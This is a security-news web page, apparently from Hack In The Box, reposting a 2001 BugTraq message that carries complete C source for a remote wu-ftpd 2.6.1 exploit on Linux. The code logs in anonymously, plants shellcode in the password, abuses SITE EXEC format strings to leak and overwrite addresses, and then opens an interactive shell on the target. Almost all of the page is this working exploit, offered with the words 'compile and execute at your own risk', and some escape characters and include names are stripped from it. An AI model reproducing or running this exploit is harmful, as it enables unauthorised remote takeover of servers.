Skip to main content

wu-ftpd 2.6.1(1) on linux Exploit

posted onMarch 8, 2001
by hitbsecnews

Posted to BugTraq:

"hi,

this is an exploit for wu-ftpd 2.6.1(1) on linux
propz to segv for giving this to me

bringin' you the 0day from the hackweiser crew, australian
+chapter

cya,
Till"

The full text follows in the read more link...
Note: Be advised that no code review has been made, compile and execute at your own risk!

----

/*
* Linux wu-ftpd - 2.6.1(1)
*
* DiGiT
*/

#include
#include
#include
#include
#include

char linuxcode[] =
"x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x31xdb"
"x43x89xd9x41xb0x3fxcdx80xebx6bx5ex31xc0x31"
"xc9x8dx5ex01x88x46x04x66xb9xffxffx01xb0x27"
"xcdx80x31xc0x8dx5ex01xb0x3dxcdx80x31xc0x31"
"xdbx8dx5ex08x89x43x02x31xc9xfexc9x31xc0x8d"
"x5ex08xb0x0cxcdx80xfexc9x75xf3x31xc0x88x46"
"x09x8dx5ex08xb0x3dxcdx80xfex0exb0x30xfexc8"
"x88x46x04x31xc0x88x46x07x89x76x08x89x46x0c"
"x89xf3x8dx4ex08x8dx56x0cxb0x0bxcdx80x31xc0"
"x31xdbxb0x01xcdx80xe8x90xffxffxffxffxffxff"
"x30x62x69x6ex30x73x68x31x2ex2ex31x31";

main (int argc, char *argv[])
{

char cmdbuf[8192];
char cbuf[1024];
char *t;
char nop[400];
int pip, i, a = 22, st = 0;
struct sockaddr_in sck;
struct hostent *hp;
long inet;
int port = 21;
fd_set fds;
unsigned int aa;
long reta, retb, tmp, retz;
int ret;
int add = 0;

memset (cmdbuf, 0x0, sizeof (cmdbuf));
memset (cbuf, 0x0, sizeof (cbuf));
memset (nop, 0x0, sizeof (nop));

if (argc < 2)
{
fprintf (stderr, "Usage: %s [ip]
", argv[0]);
exit (-1);
}

pip = socket (PF_INET, SOCK_STREAM, 0);

if (!pip)
{
perror ("socket()");
exit (-1);
}

inet = inet_addr (argv[1]);
if (inet == -1)
{
if (hp = gethostbyname (argv[1]))
memcpy (&inet, hp->h_addr, 4);
else
inet = -1;
if (inet == -1)
{
fprintf (stderr, "Cant resolv %s!!
", argv[1]);
exit (-1);
}
}
sck.sin_family = PF_INET;
sck.sin_port = htons (port);
sck.sin_addr.s_addr = inet;

if (connect (pip, (struct sockaddr *) &sck, sizeof (sck)) < 0)
{
perror ("Connect() ");
exit (-1);
}

read (pip, cbuf, 1023);
fprintf (stderr, "Connected to: %s
", argv[1]);
fprintf (stderr, "Banner: %s
", cbuf);
strcpy (cmdbuf, "user ftp
");
write (pip, cmdbuf, strlen (cmdbuf));
memset (nop, 0x90, sizeof (nop) - strlen (linuxcode) - 10);

strcat (nop, linuxcode);

memset (cmdbuf, 0x0, sizeof (cmdbuf));
sprintf (cmdbuf, "pass %s
", nop);
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
if (!strncmp (cmdbuf, "530", 3))
{
printf ("loggin incorrect : %s
", cmdbuf);
exit (-1);
}
fprintf (stderr, "Logged in..
");
fprintf (stderr, "+ Finding ret addresses
");
memset (cmdbuf, 0x0, sizeof (cmdbuf));
strcpy (cmdbuf, "SITE EXEC %x %x %x %x +%x |%x
");
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
if (!strncmp (cmdbuf + 4, "%x", 2))
{
fprintf (stderr, "[1m[31mWuftpd is not vulnerable : %s
[0m",
cmdbuf);
exit (-1);
}
else
{
fprintf (stderr, "[1m[32mWuftpd is vulnerable : %s
[0m",
cmdbuf);
}
reta = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
retz = strtoul (strstr (cmdbuf, "+") + 1, strstr (cmdbuf, "|") +
11, 16);

memset (cmdbuf, 0x0, sizeof (cmdbuf));
strcpy (cmdbuf, "SITE EXEC ");
for (ret = 0; ret <= 88; ret++)
{
strcat (cmdbuf, "%x");
}
strcat (cmdbuf, "|%x
");
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
retb = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
printf ("Ret location befor: %x
", reta);
if (reta == 0)
reta = retz;
else
add = 600;
reta = reta - 0x58;
retb = retb + 100 - 0x2569 - add;
printf ("Ret location : %x
", reta);
printf ("Proctitle addres : %x and %u
", retb, retb);
sleep (2);
memset (cmdbuf, 0x0, sizeof (cmdbuf));

sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
a = 22;
memset (cbuf, 0x0, sizeof (cbuf));
while (1)
{

memset (cmdbuf, 0x0, sizeof (cmdbuf));

sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
for (i = 0; i <= 128; i++)
strcat (cmdbuf, "%.f");
for (i = 0; i <= a; i++)
strcat (cmdbuf, "%d");
sprintf (cbuf, "|%%x|%%x
", aa + 9807 - 460);
strcat (cmdbuf, cbuf);
write (pip, cmdbuf, strlen (cmdbuf));
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
t = (char *) strstr (cmdbuf, "|");
tmp = strtoul (t + 1, t + 11, 16);
if (tmp != 0)
{
fprintf (stderr, "tmp 1 : 0x%x
", tmp);
if (tmp == reta)
{
fprintf (stderr, "Cached a : %d
", a);
st = 1;
break;
}
tmp = strtoul (t + 11, t + 22, 16);
fprintf (stderr, "tmp 2 : 0x%x
", tmp);
if (tmp == reta)
{
fprintf (stderr, "Cached a : %d
", a);
st = 2;
break;
}
}
if (st > 0)
break;
a++;
}
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
memset (cbuf, 0x0, sizeof (cbuf));

sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
for (i = 0; i <= 128; i++)
strcat (cmdbuf, "%.f");
if (add != 600)
a = a - 1;
fprintf (stderr, "Trying with : %d
", a);
for (i = 0; i <= a; i++)
strcat (cmdbuf, "%d");

aa = retb;
if (add == 600)
sprintf (cbuf, "|%%.%ud%%n
", aa + 9807);
else
sprintf (cbuf, "|%%.%ud%%n
", aa + 9807 - 480);

strcat (cmdbuf, cbuf);
write (pip, cmdbuf, strlen (cmdbuf));
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));

fprintf (stderr, "[1m[33m Wait for a shell.....
[0m");

while (1)
{
FD_ZERO (&fds);
FD_SET (0, &fds);
FD_SET (pip, &fds);
select (255, &fds, NULL, NULL, NULL);
if (FD_ISSET (pip, &fds))
{
memset (cbuf, 0x0, sizeof (cbuf));
ret = read (pip, cbuf, sizeof (cbuf) - 1);
if (ret <= 0)
{
printf ("Connection closed - EOF
");
exit (-1);
}
printf ("%s", cbuf);
}
if (FD_ISSET (0, &fds))
{
memset (cbuf, 0x0, sizeof (cbuf));
read (0, cbuf, sizeof (cbuf) - 1);
write (pip, cbuf, strlen (cbuf));
}
}
close (pip);
}

_______________________________
The Proton

_______________________________

Source

Tags

Audio/Video

You May Also Like

Recent News

Friday, November 29th

Tuesday, November 19th

Friday, November 8th

Friday, November 1st

Tuesday, July 9th

Wednesday, July 3rd

Friday, June 28th

Thursday, June 27th

Thursday, June 13th

Wednesday, June 12th

Tuesday, June 11th

Simplenews subscription

Stay informed - subscribe to our newsletter.
The subscriber's email address.
Keeping Knowledge Free for Over a Decade

Copyright © 2018 Hack In The Box. All rights reserved.

36th Floor, Menara Maxis, Kuala Lumpur City Centre 50088 Kuala Lumpur Malaysia
Tel: +603-2615-7299 Fax: +603-2615-0088